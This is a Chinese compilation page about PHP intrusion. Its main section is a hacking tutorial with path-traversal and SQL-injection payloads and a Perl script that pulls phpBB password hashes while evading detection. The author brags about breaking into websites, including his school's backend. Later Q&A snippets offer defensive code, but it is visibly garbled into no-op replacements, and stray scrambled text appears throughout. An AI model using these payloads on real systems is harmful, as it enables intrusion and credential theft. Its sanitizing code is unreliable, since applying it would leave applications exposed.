php入侵oror
① php頁面漏洞分析及相關問題解決
從現在的網路安全來看,大家最關注和接觸最多的WEB頁面漏洞應該是ASP了,在這方面,小竹是專家,我沒發言權。然而在PHP方面來看,也同樣存在很嚴重的安全問題,但是這方面的文章卻不多。在這里,就跟大家來稍微的討論一下PHP頁面的相關漏洞吧。
我對目前常見的PHP漏洞做了一下總結,大致分為以下幾種:包含文件漏洞,腳本命令執行漏洞,文件泄露漏洞,sql注入漏洞等幾種。當然,至於COOKIE欺騙等一部分通用的技術就不在這里討論了,這些資料網上也很多。那麼,我們就一個一個來分析一下怎樣利用這些漏洞吧!
首先,我們來討論包含文件漏洞。這個漏洞應該說是PHP獨有的吧。這是由於不充分處理外部提供的惡意數據,從而導致遠程攻擊者可以利用這些漏洞以WEB進程許可權在系統上執行任意命令。我們來看一個例子:假設在a.php中有這樣一句代碼:
以下是引用片段:
include($include."/xxx.php");
?
在這段代碼中,$include一般是一個已經設置好的路徑,但是我們可以通過自己構造一個路徑來達到攻擊的目的。比方說我們提交:a.php?include=
接著,我們再來看一下腳本命令執行漏洞。這是由於對用戶提交的URI參數缺少充分過濾,提交包含惡意HTML代碼的數據,可導致觸發跨站腳本攻擊,可能獲得目標用戶的敏感信息。我們也舉個例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php頁面對PHPSESSID缺少充分的過濾,我們可以通過這樣的代碼來達到攻擊的目的
再然後,我們就來看看文件泄露漏洞了,這種漏洞是由於對用戶提交參數缺少充分過濾,遠程攻擊者可以利用它進行目錄遍歷攻擊以及獲取一些敏感信息。我們拿最近發現的phpMyAdmin來做例子。在phpMyAdmin中,export.php頁面沒有對用戶提交的'what'參數進行充分過濾,遠程攻擊者提交包含多個'../'字元的數據,便可繞過WEB ROOT限制,以WEB許可權查看系統上的任意文件信息。比方說打入這樣一個地址:export.php?what=../../../../../../etc/passwd%00 就可以達到文件泄露的目的了。在這方面相對多一點,有:myPHPNuke,McNews等等。
最後,我們又要回到最興奮的地方了。想想我們平時在asp頁面中用SQL注入有多麼爽,以前還要手動注入,一直到小竹悟出"SQL注入密笈"(嘿嘿),然後再開做出NBSI以後,我們NB聯盟真是拉出一片天空。曾先後幫CSDN,大富翁論壇,中國頻道等大型網站找出漏洞。(這些廢話不多說了,有點跑題了...)。
還是言規正傳,其實在asp中SQL的注入和php中的SQL注入大致相同,只不過稍微注意一下用的幾個函數就好了。將asc改成ASCII,len改成LENGTH,其他函數基本不變了。其實大家看到PHP的SQL注入,是不是都會想到PHP-NUKE和PHPBB呢?不錯,俗話說樹大招分,像動網這樣的論壇在asp界就該是漏洞這王了,這並不是說它的論壇安全太差,而是名氣太響,別人用的肢山多了歷團中,研究的人也就多了,發現的安全漏洞也就越多了。PHPBB也是一樣的,現在很大一部分人用PHP做論壇的話,一般都是選擇了PHPBB。它的漏洞也是一直在出,從最早 phpBB 1.4.0版本被人發現漏洞,到現在最近的phpBB 2.0.6版本的groupcp.php,,以及之前發現的search.php,profile.php,viewtopic.php等等加起來,大概也有十來個樣子吧。這也一直導致,一部分人在研究php漏洞的時候都會拿它做實驗品,所謂百練成精嘛,相信以後的PHPBB會越來越好。
好了,我們還是來分析一下漏洞產生的原因吧。拿viewtopic.php頁面來說,由於在調用viewtopic.php時,直接從GET請求中獲得"topic_id"並傳遞給SQL查詢命令,而並沒有進行一些過濾的處理,攻擊者可以提交特殊的SQL字元串用於獲得MD5密碼,獲得此密碼信息可以用於自動登錄或者進行暴力破或氏解。(我想應該不會有人想去暴力破解吧,除非有特別重要的原因)。先看一下相關源代碼:
以下是引用片段:
#
if(isset($HTTP_GET_VARS[POST_TOPIC_URL]))
#
{
#
$topic_id=intval($HTTP_GET_VARS[POST_TOPIC_URL]);
#
}
#
elseif(isset($HTTP_GET_VARS['topic']))
#
{
#
$topic_id=intval($HTTP_GET_VARS['topic']);
#
}
從上面我們可以看出,如果提交的view=newest並且sid設置了值的話,執行的查詢代碼像下面的這個樣子(如果你還沒看過PHPBB源代碼的話,建議你看了再對著這里來看,受影響系統為:phpBB 2.0.5和phpBB 2.0.4)。
以下是引用片段:
#
$sql = "SELECT p.post_id
#
FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s," . USERS_TABLE . " u
#
WHERE s.session_id = '$session_id'
#
AND u.user_id = s.session_user_id
#
AND p.topic_id = $topic_id
#
AND p.post_time = u.user_lastvisit
#
ORDER BY p.post_time ASC
#
LIMIT 1";
Rick提供了下面的這斷測試代碼:
use IO::Socket;
$remote = shift || 'localhost'
$view_topic = shift ||'/phpBB2/viewtopic.php'
$uid = shift || 2;
$port = 80;
$dBType = 'mysql4'
# mysql4 or pgsql
print "Trying to get password hash for uid $uid server $remote dbtype: $dBType ";
$p = "";
for($index=1; $index=32; $index++)
{
$socket = IO::Socket::INET-new(PeerAddr = $remote,
PeerPort = $port,
Proto = "tcp",
Type = SOCK_STREAM)
or die "Couldnt connect to $remote:$port : $@ ";
$str = "GET $view_topic" . "?sid=1topic_id=-1" .random_encode(make_dbsql()) ."view=newest" . " HTTP/1.0 ";
print $socket $str;
print $socket "Cookie: phpBB2mysql_sid=1 ";
# replace this for pgsql or remove it
print $socket "Host: $remote ";
while ($answer = $socket)
{
if ($answer =~ /location:.*x23(d+)/)# Matches the location: viewtopic.php?p=
{
$p .= chr ();
}
}
close($socket);
}
print " MD5 Hash for uid $uid is $p ";
# random encode str. helps avoid detection
sub random_encode
{
$str = shift;
$ret = "";
for($i=0; $i
{
$c = substr($str,$i,1);
$j = rand length($str) * 1000;
if (int($j) % 2 || $c eq ' ')
{
$ret .= "%" . sprintf("%x",ord($c));
}
#p#副標題#e#
else
{
$ret .= $c;
}
}
return $ret;
}
sub make_dbsql
{
if ($dBType eq 'mysql4')
{
return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;
} elsif ($dBType eq 'pgsql')
{
return "; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
}
else
{
return "";
}
}
這段代碼,我就不多做解釋了.作用是獲得HASH值.
看到這里,大家可能有點疑問,為什麼我前面講的那些改的函數怎麼沒有用到,我講出來不怕大家笑話:其實網上很多站點有些頁面的查詢語句看起來會是這樣:
display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc
不要笑,這是真的,我還靠這個進過幾個大型網站.至於哪一些,不好講出來,不過我們學校的網站,我就是靠這個進後台的,把前面那函數用上吧.不然你只有改人家的密碼了哦!!!
差點忘了一點,在SQL注入的時候,PHP與ASP有所不同,mysql對sql語句的運用沒有mssql靈活,因此,很多在mssql上可以用的查詢語句在mysql中都不能奏效了. 一般我們常見的注入語句像這樣:aaa.php?id=a' into outfile 'pass.txt或是aaa.php?id=a' into outfile 'pass.txt' /*再進一步可以改成:aaa.php?id=a' or 1=1 union select id,name,password form users into outfile 'c:/a.txt
這樣可以將資料庫數據導出為文件,然後可以查看.
或是這樣:mode=',user_level=Ɗ
這個語句一般用在修改資料時,假設頁面存在漏洞的話,就可以達到提升許可權的做用.
其它的如' OR 1=1 -- 或者:1' or 1=Ƈ則跟asp差不多.這里不多講了.在php裡面,SQL注入看來還是漏洞之首啊,有太多的頁面存在這個問題了.
其實大家可以看出來,上面那些分類歸根結底只有一個原因:提交參數沒過濾或是過濾不夠嚴謹.
#p#副標題#e#
② PHP判斷語句,and和or的使用
編程語言的邏輯判斷詞意思都一樣。and就是並且的意思聯合上一條件一起判斷,or或者的意思,單獨的判斷這個條件or其他條件。 希望對您有所幫助。
③ php中的||和or,有什麼區別呢優先順序一樣么
if(asdfjklkj==sdfjlk or sadfl==sdfkjh)和if(asdfads==hgk || asdfsad==fghdfgh)
前者全文字顯得正規,檔次,只是or混在其中不是很好找;
後者||符號明顯好找,易懂。
優先順序順序是
&&
||
and
or
優先順序順序知道的人不多,老手也沒多少背下來的,因為他們都加(括弧)。
④ 請問Php怎樣修復 'or'='or' 漏洞
用這個 addslashes() 函數 轉義就可以了
他會把 字元串中 所有 單引號 ' 雙引號野碼 " 反斜線 \ 前面加宏叢一個反斜線
'蔽脊櫻or'='or' 會變成 \'or\'=\'or\'
⑤ PHP or 的用法
從你的這里看起來,加上猜測
id='$_GET[p_del_id]'族此鉛 即是要刪除一級分兆好類
p_id='$_GET[p_del_id]' 是要刪除所有相應的二級分類
用OR的話就是說 要刪除某個指定的分類(同時扒戚刪除其二級分類)
⑥ php之and,or使用
php的and,or,其實有著then,else的作用,吵鄭看如下例子
1
與下面例子是等價的
2
與下面基中例子是搏碰山等價的
3
與下面例子是等價的
⑦ 如何防止代碼注入攻擊在PHP
一,HTML防注入。
一般的html注入都是在字元串中加入了html標簽,用下JAVA代碼可以去掉這部分代碼。
代碼如下,自己封裝成方法即可。
String msge = "asdasdasdasd <div id=\"f\">asdfsdf";
System.out.println(msge);
msge = msge.replace("&", "&");
msge = msge.replace("<", "<");
msge = msge.replace(" ", " ");
msge = msge.replace(">", ">");
msge = msge.replace("\"", """);
msge = msge.replace("'", "&qpos;");
System.out.println(msge);
二、防SQL注入
最簡單最容易的是限制用戶輸入。
簡單點的就是不允許用戶輸入單引號 和 --,因為單引號號--在SQL中都是影響執行的。
但SQL注入是多方面的,防止的方法也有很多種。
1、地址欄禁止特殊字元防SQL注入
把特殊字元(如and、or、'、")都禁止提交就可以防止注入了。
2、php過濾html字元串,防止SQL注入
批量過濾post,get敏感數據
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
數據過濾函數
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
3、替換HTML尾標簽
function lib_replace_end_tag($str)
{
if (empty($str)) return false;
$str = htmlspecialchars($str);
$str = str_replace( '/', "", $str);
$str = str_replace("\\", "", $str);
$str = str_replace(">", "", $str);
$str = str_replace("<", "", $str);
$str = str_replace("<SCRIPT>", "", $str);
$str = str_replace("</SCRIPT>", "", $str);
$str = str_replace("<script>", "", $str);
$str = str_replace("</script>", "", $str);
$str=str_replace("select","select",$str);
$str=str_replace("join","join",$str);
$str=str_replace("union","union",$str);
$str=str_replace("where","where",$str);
$str=str_replace("insert","insert",$str);
$str=str_replace("delete","delete",$str);
$str=str_replace("update","update",$str);
$str=str_replace("like","like",$str);
$str=str_replace("drop","drop",$str);
$str=str_replace("create","create",$str);
$str=str_replace("modify","modify",$str);
$str=str_replace("rename","rename",$str);
$str=str_replace("alter","alter",$str);
$str=str_replace("cas","cast",$str);
$str=str_replace("&","&",$str);
$str=str_replace(">",">",$str);
$str=str_replace("<","<",$str);
$str=str_replace(" ",chr(32),$str);
$str=str_replace(" ",chr(9),$str);
$str=str_replace(" ",chr(9),$str);
$str=str_replace("&",chr(34),$str);
$str=str_replace("'",chr(39),$str);
$str=str_replace("<br />",chr(13),$str);
$str=str_replace("''","'",$str);
$str=str_replace("css","'",$str);
$str=str_replace("CSS","'",$str);
return $str;
}
三、專業的事情交給專業的工具去做。
安裝安全軟體。例如,在伺服器中安裝「伺服器安全狗」,可以設置防注入,防攻擊的設置,只要設置好安全規則,就可以屏蔽大多數攻擊入侵。